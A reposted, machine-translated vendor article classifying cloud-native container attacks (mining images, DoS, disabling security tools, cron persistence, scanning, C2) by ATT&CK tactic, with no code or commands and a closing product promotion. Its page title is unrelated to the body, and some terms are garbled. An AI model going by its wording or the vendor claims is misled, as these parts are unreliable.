Report on High-quality Development of Central Enterprises (2021): Achieving Three Historical Breakthroughs and Steady Progress in High-quality Development of Central Enterprises

2026年5月23日 | admin | A1

  In the past few years, there have been more and more reports of attacks on cloud native environment. Combined with the support experience of cloud native security projects of many large customers and the research and analysis of various reports, we have a certain understanding of the attacker’s tactics, TTPs, activity cycle and attack complexity. Therefore, the content of this paper is summarized, hoping to be more helpful to the ecological construction of cloud native security.

  At present, in the cloud native scene, the main motivation of attackers is to hijack resources for mining and DoS attacks.

  Take the mining scene as an example. In this kind of attack, the attacker mainly uses the binary file xmrig, and these images clearly state that their design purpose is to mine. On the other hand, if the encrypted mining process is hidden in the image that someone pulls and runs, the component is likely to become a harmful application (PUA). Because this kind of attack will lead to performance degradation, MITRE ATT&CK framework defines it as resource hijacking.

  Take the DoS attack scenario as an example. Slowloris attack is a denial-of-service (DoS) attack against the HTTP server using special software (such as slowhttptest). During the attack, the attacking machine sends an incomplete HTTP request, causing the victim host to open multiple links while waiting to receive the remaining request information. As a result, the host server has reached the maximum concurrent link opening limit and cannot open new links to serve legitimate HTTP requests.

 

Figure 1: Denial of Service Attack Scheme

 

  Since the beginning of 2020, the number of container-based attacks has increased dramatically, and attackers have begun to adopt more and more advanced bypass technologies, which can bypass conventional security strategies, such as static malware scanning. In addition, attackers use more and more technologies (for example, defense bypass technology for hiding commands and controlling infrastructure Web services) to hide their attacks and achieve persistence.

  In order to better analyze the evolution path of hacker attacks in cloud native scenes, we first classify cloud native attacks, and then analyze them based on ATT&CK framework.

  Induction and classification of cloud native attacks

  An experienced attacker’s behavior may contain multiple attack actions. We classify the attack behavior from two dimensions: the first is the complexity of the attack, and the second is the scope of the attack.

  Based on complexity division

  Some attackers use special malicious images with clear image names, and their image names are simple, such as XMRIG or UDPFLOOD. In most cases, this attack technique is not difficult, and an attacker can use it to pull an image designed by a third party from Docker Hub and run the image with the relevant configuration.

  Some attackers use legal image names, but such image names are often deceptive, such as Ubuntu1. In addition, the author of the image may have used various techniques to bypass detection, such as closing security tools or confusing files. In most cases, the complexity of this attack technique is moderate. The attacker designs the image and places it in Docker Hub, and then gives it a misleading name, such as Nginx.

  In addition, the attacker will also take advantage of the trusted base image. This attack technique is the most complicated. Attackers use the latest version of the official universal image (for example,’ alpine:latest’). After all, using the official and seemingly harmless image will increase the possibility that the image will be scanned by most security tools, because users generally think that this kind of image should not have any loopholes or malicious components. Some organizations may only allow mirrors in the white list. The use of official images increases the possibility that the attack will be carried out as planned, because in most cases, these images are pre-approved for use.

 

Table 1: Complexity Analysis of Cloud Native Attacks

 

  Based on the division of influence scope

  In addition to classifying attack types based on complexity, we also sorted out the target influence range of each attack. Based on this analysis, we detected two main types: network denial of service attacks and resource hijacking (mainly for mining).

 

Table 2: Impact Scope Analysis of Cloud Native Attacks

 

  Cloud Native Analysis Based on ATT&CK

  Based on the above summary of cloud native attacks, we have a basic understanding of the complexity and scope of cloud native attacks. Now, we put the related attacks into the ATT&CK framework for analysis, so that we can have a deeper understanding of TTPs, attack cycle and other characteristics of cloud native attacks. Below, we analyzed the attacks in the past 12 months based on the ATT&CK framework. Because the attacker usually uses the open application vulnerabilities on the Internet to achieve the tactic of "initial access", we have not introduced this tactic in detail.

 

Table 3: Cloud Native Attack Diagram Based on ATT&CK Framework

 

  The most commonly used tactics: defensive bypass, command and control, and discovery.

  As shown in the figure below, among all the attacks we found, the most commonly used tactics of attackers are defensive bypass, command and control, and discovery, which reflects the persistence and complexity of attacks.

 

Figure 2: The most commonly used tactics are defensive bypass, command and control, and discovery.

 

  Usually, the most common target of attackers is to hijack resources, more specifically, to dig mines. In order to make better use of the host and bypass detection, attackers will consider the characteristics of the host. Therefore, it is not surprising that "discovery" is one of the most commonly used tactics. In addition, some attacks are very secretive, and each image uses several "defensive bypass" technologies, such as disabling security tools and using anti-debugging technology.

  In some attacks, the attacker used a harmless image. But once it is run, the container will be used to download malicious components remotely from outside, including remote communication with C2 server used by attackers. Therefore, the third most commonly used category is "command and control" tactics.

 

Figure 3: Target Classification of Attackers Using Mirror Attacks

 

  As can be seen from the above figure, 95% of images are used to hijack resources (mining) and 5% are used to launch network denial of service attacks. This means that although there are various mirrors used to attack the cloud native environment, most attacks are aimed at mining. We speculate that denial-of-service attack (DoS) is not very common, because this attack usually occurs in the field attack scenario, and attackers can easily find DoS services or find powerful tools to launch major attacks.

  An example of cloud native attack based on ATT&CK

  For cloud native attacks, we use MITRE ATT&CK framework as the basis for analysis. Most TTP used by attackers is a subcategory of 12 tactical classifications in the ATT&CK framework. By using these subcategories, we introduced the descriptions and some examples of each subcategory. In addition, MITRE ATT&CK also provides a method to detect threats and reduce risks.

  Below, let’s analyze the specific tactics and technologies used by attackers against cloud native.

  ● carry out——scriptcarry out

  The image alpine:latest used for the attack will download some scripts at runtime. Using these technologies, attackers can bypass some security tools that do not perform dynamic analysis of images. In this example, the script used by the attacker was designed by someone else and may have been traded on the dark net. This script can download payload and send a ping command to the web service, which can let the attacker check the IP address of the target host.

 

Figure 4: Running a legal’ alpine:latest’ image through a malicious pop shell script.

 

  ● Persistence——Local job scheduling

  In some attacks, attackers use local job scheduling to run commands or scripts. These commands run in the background at regular intervals without user interaction. This increases the persistence of the attack.

 

Figure 5: Using cron jobs to increase the persistence of attacks

 

   Defensive bypass-disable security tools

  Alpine:latest will download some scripts at runtime, and some of the functions can be used to detect and disable security tools, such as SELinux and AppArmor.

 

Figure 6: Attackers are disabling security tools.

 

   Discovery-Network Service Scanning

  An attacker may try to obtain a list of services running on a remote host, including those that are easily exploited by remote software. Methods of obtaining this information include scanning ports and vulnerabilities with tools that attackers bring to the victim system. We have found that attackers are using masscan and zgrab at runtime.

 

Figure 7: Scanning external and internal networks with network scanning tools.

 

   Command and Control-Web Services

  The attacker used a variety of secret communication technologies to communicate with the fallen host, as shown in the following table:

 

Table 4: Attackers use secret communication technology to communicate with fallen hosts.

 

  conclusion

  Facing the complex cloud native environment, understanding the cloud native attack types and analyzing the attack paths will help to find more effective intrusion detection methods and improve the security protection ability. In the field of cloud native, Ivy is the leader of cloud native security services.

  Ivy, with the first cloud native security laboratory in China, began to develop container security technology in 2018. After three years of careful polishing and 2.3 million lines of self-developed code, it has formed a native, safe, advanced and complete product solution. The Ivy Honeycomb Cloud Native Security Platform deploys complete cloud native biochemistry, providing security capabilities covering the whole life cycle of construction, distribution and operation, and helping enterprises to complete DevSecOps security practices.

  At present, the Ivy Honeycomb has been used by more than 100+ head customers, and its excellent technology and excellent performance have been highly recognized by many authoritative experts and institutions in the industry.

  Qingteng is the first security enterprise in China to pass the highest-level certification of Trusted Cloud Container Security Solution of ICT Institute, and it is also the only security enterprise selected as "Innovative Product of Cloud Native Technology in 2021", and has obtained 14 patents and software copyrights related to cloud native security.

  Ivy is an important member of cloud native computing foundation CNCF, Linux foundation, cloud original production industry alliance, Yangtze River Delta cloud original production industry alliance and other institutions, and joins hands with all parties to actively promote the rapid development of cloud native security. In addition, Qingteng also actively participated in the work of cloud native security organized by the Ministry of Industry and Information Technology, the Ministry of Public Security and other regulatory units, deeply participated in the preparation of the industry’s first White Paper on Cloud Native Architecture Security (2021), and participated in the preparation and formulation of public security industry standards, such as Safety Technical Requirements for Information Security Technology Container Security Monitoring Products, and Cloud Native Maturity Model (CNMM) Standard System.

 

Disclaimer: The content of this article is published or reproduced by this website, which only represents the author’s personal views and has nothing to do with this website. For readers’ reference only, please check the relevant contents yourself. )